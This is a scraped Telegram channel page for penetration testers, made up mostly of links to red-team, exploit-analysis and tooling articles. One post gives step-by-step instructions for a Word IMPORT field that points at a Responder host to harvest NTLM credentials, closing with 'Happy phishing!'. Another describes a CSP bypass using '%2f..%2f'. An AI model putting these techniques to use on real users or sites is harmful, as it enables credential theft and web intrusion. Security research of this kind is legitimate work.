Pentester – Telegram

Pentester

2.94K subscribers

120 photos

3 videos

163 files

2.77K links

- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security

Download Telegram

About

Blog

Apps

Platform

2.94K subscribers

Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!

115 views07:41

Wireless Attacks on Aircraft Instrument Landing Systems
https://t.co/mRRTiUKSmg

86 views07:47

Persistence: “the continued or prolonged existence of something”
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW

www.mdsec.co.uk

Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office – MDSec

75 views04:57

https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790

RouterOS Post Exploitation

Shared Objects, RC Scripts, and a Symlink

67 views04:59

https://bugreader.com/jubabaghdad@send-messages-through-notification-to-facebook-workplace-users-without-getting-blocked-101

Send messages through notification to facebook & workplace users without getting blocked

This is allow the attacker to send messages through "notifications" to any user without getting blocked cause the attacker from workplace ;)

70 views05:03

81 views05:14

The_Cyber_Plumber’s_Handbook__The.pdf

175 views05:15

https://www.blackhillsinfosec.com/using-cloudfront-to-relay-cobalt-strike-traffic/

Black Hills Information Security, Inc.

Using CloudFront to Relay Cobalt Strike Traffic - Black Hills Information Security, Inc.

Brian Fehrman // Many of you have likely heard of Domain Fronting. Domain Fronting is a technique that can allow your C2 traffic to blend in with a target’s traffic […]

88 views18:52

If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that.

This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc

A live pastebin for HTML, CSS & JavaScript and a range of processors, including SCSS, CoffeeScript, Jade and more...

76 views18:16

https://github.com/lgandx/Responder

GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication…

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...

75 views18:20

96 views15:10

Building_Telegram_Bots__Develop.pdf

212 views15:11

.NET malware threat: internals and reversing https://t.co/bUNRmUdvx1

76 views16:30

https://www.attackdebris.com/?p=470

Low Privilege Active Directory Enumeration from a non-Domain Joined Host

Scenario You have recovered Domain User credentials for a domain but have no privileged or interactive access to any targets i.e. no Domain Admin account or any account that is capable of establis…

82 views03:28

https://lockboxx.blogspot.com/2019/08/macos-red-teaming-207-remote-apple.html?m=1

MacOS Red Teaming 207: Remote Apple Events (RAE)

A blog about information security, hacking, and protecting digital infrastructure. Penetration testing, malware analysis, and intrusion detection.

78 views04:04

DNS investigation web tools (17 tools): https://t.co/o6eY7OGwKJ

trimstray/the-book-of-secret-knowledge

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - trimstray/the-book-of-secret-knowledge

76 views04:16

Taking control of VMWare through the universal host controller interface
Part 1: https://www.zerodayinitiative.com/blog/2019/5/7/taking-control-of-vmware-through-the-universal-host-controller-interface-part-1
Part 2: https://www.zerodayinitiative.com/blog/2019/8/15/taking-control-of-vmware-through-the-universal-host-control-interface-part-2

#ITSecurity #pentest #hacking #hack #it

Zero Day Initiative

Zero Day Initiative — Taking Control of VMware Through the Universal Host Controller Interface: Part 1

Pwn2Own is a heck of an amazing contest. Not only because of all the media and vibe that goes with it, but because of the caliber of skills that we see demonstrated. It’s also quite fascinating to see new people burst onto the scene with mad skills. Additionally…

69 views06:49

https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1/amp/?__twitter_impression=true

Security Boulevard

Kubernetes Pentest Methodology Part 1 - Security Boulevard

As the pace of life accelerates, we spend less time waiting or in downtime. Kubernetes offers something similar for our life with technology. It is a container orchestration platform that offers an easy, automated way...

72 views06:50

64 views18:50

https://www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html

DejaBlue: Analyzing a RDP Heap Overflow

In August 2019 Microsoft announced it had patched a collection of RDP bugs, two of which were wormable. The wormable bugs, CVE-2019-1181 & CVE-2019-1182 affect every OS from Windows 7 to Windows 10. There is some confusion about which CVE is which, though…

69 views03:00

https://github.com/toniblyx/my-arsenal-of-aws-security-tools

GitHub - toniblyx/my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing…

List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. - toniblyx/my-arsenal-of-aws-security-tools

64 views03:04